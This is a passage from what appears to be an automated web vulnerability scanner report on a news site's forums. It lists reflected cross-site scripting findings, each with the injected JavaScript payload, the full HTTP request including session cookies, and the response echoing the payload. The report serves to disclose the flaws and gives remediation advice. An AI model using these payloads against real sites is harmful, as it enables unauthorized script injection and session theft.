Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
t">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/ferret-theory-lv?7fe24"-alert(1)-"022a6eab7a3=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.106. http://forums.mercurynews.com/topic/oil-and-iran-war [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-and-iran-war

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2deab"-alert(1)-"4a706fc981a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s
...[SNIP]...

3.107. http://forums.mercurynews.com/topic/oil-and-iran-war [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-and-iran-war

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96781"-alert(1)-"1dccca72dc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/oil-and-iran-war96781"-alert(1)-"1dccca72dc8 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:29 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
pt">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/oil-and-iran-war96781"-alert(1)-"1dccca72dc8";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.108. http://forums.mercurynews.com/topic/oil-and-iran-war [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-and-iran-war

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 195d3"-alert(1)-"bbdb9078104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/oil-and-iran-war?195d3"-alert(1)-"bbdb9078104=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
t">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/oil-and-iran-war?195d3"-alert(1)-"bbdb9078104=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.109. http://forums.mercurynews.com/topic/oil-price-and-iran-war [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-price-and-iran-war

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdef6"-alert(1)-"abaffde0a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topicbdef6"-alert(1)-"abaffde0a85/oil-price-and-iran-war HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topicbdef6"-alert(1)-"abaffde0a85/oil-price-and-iran-war";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageNa
...[SNIP]...

3.110. http://forums.mercurynews.com/topic/oil-price-and-iran-war [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-price-and-iran-war

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7b93"-alert(1)-"c1260fb02e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/oil-price-and-iran-warb7b93"-alert(1)-"c1260fb02e0 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
f (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/oil-price-and-iran-warb7b93"-alert(1)-"c1260fb02e0";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.111. http://forums.mercurynews.com/topic/oil-price-and-iran-war [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-price-and-iran-war

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 363f2"-alert(1)-"de8dec15453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/oil-price-and-iran-war?363f2"-alert(1)-"de8dec15453=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 98092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
(typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/oil-price-and-iran-war?363f2"-alert(1)-"de8dec15453=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.112. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/pentagon-cant-explain-missile-off-california

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe5e4"-alert(1)-"7be3daf7363 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topicfe5e4"-alert(1)-"7be3daf7363/pentagon-cant-explain-missile-off-california HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topicfe5e4"-alert(1)-"7be3daf7363/pentagon-cant-explain-missile-off-california";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURC
...[SNIP]...

3.113. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/pentagon-cant-explain-missile-off-california

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64259"-alert(1)-"06154ffc603 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/pentagon-cant-explain-missile-off-california64259"-alert(1)-"06154ffc603 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ned') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/pentagon-cant-explain-missile-off-california64259"-alert(1)-"06154ffc603";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.114. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/pentagon-cant-explain-missile-off-california

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab401"-alert(1)-"0432824b438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/pentagon-cant-explain-missile-off-california?ab401"-alert(1)-"0432824b438=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ed') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/pentagon-cant-explain-missile-off-california?ab401"-alert(1)-"0432824b438=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.115. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d4a7"-alert(1)-"28a781fd586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic8d4a7"-alert(1)-"28a781fd586/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic8d4a7"-alert(1)-"28a781fd586/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=get
...[SNIP]...

3.116. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e3d4"-alert(1)-"47d584067f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy1e3d4"-alert(1)-"47d584067f5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:07 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
"";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy1e3d4"-alert(1)-"47d584067f5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.117. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20852"-alert(1)-"14a59680a3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy?20852"-alert(1)-"14a59680a3a=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
